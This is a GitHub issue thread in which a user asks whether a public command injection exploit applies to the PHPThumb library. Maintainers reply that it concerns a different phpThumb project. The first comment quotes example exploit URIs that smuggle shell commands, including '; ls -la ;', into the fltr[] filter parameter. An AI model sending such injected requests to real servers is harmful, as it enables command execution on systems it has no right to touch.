search

masterexploder / PHPThumb

PHP Thumbnail & Image Manipulation Library
http://phpthumb.gxdlabs.com
980 stars 264 forks source link

Command Injection Vulnerability? #130

Open dliebner opened 8 years ago

dliebner commented 8 years ago

When googling for "PHPThumb", one of the suggested searches is "PHPThumb exploit". One of the results links to this:

http://www.securityfocus.com/bid/39605/exploit

Attackers can exploit this issue via a browser. Reports indicate that this issue is being exploited in the wild.

The following example URIs are available:

http://www.example.com/phpThumb_1.7.9/phpThumb.php?src=Z:/home/example.com/www/kartinka.jpg&fltr[]=blur|5 -quality 75 -interlace line "Z:/home/example.com/www/kartinka.jpg" jpeg:"Z:/home/example.com

http://www.example.com/phpThumb_1.7.9/phpThumb.php?src=/home/example.com/public_html/kartinka.jpg&fltr[]=blur|5 -quality 75 -interlace line "/home/example.com/public_html/kartinka.jpg" jpeg:"/home/example.com/public_html/kartinka.jpg" ; ls -la ;&phpThumbDebug=9

Is this is an actual issue?

bacinsky commented 7 years ago

Hi, PHPThumb is a library, it does not implements the image serving so it is pure to the user how will use it. But this library seems abandoned, I recommend you to use avalanche123/Imagine instead.

pmaselkowski commented 7 years ago

@dliebner The security exploit You linked to is not related to this particular library - it's just a popular name for thumbnailing libraries.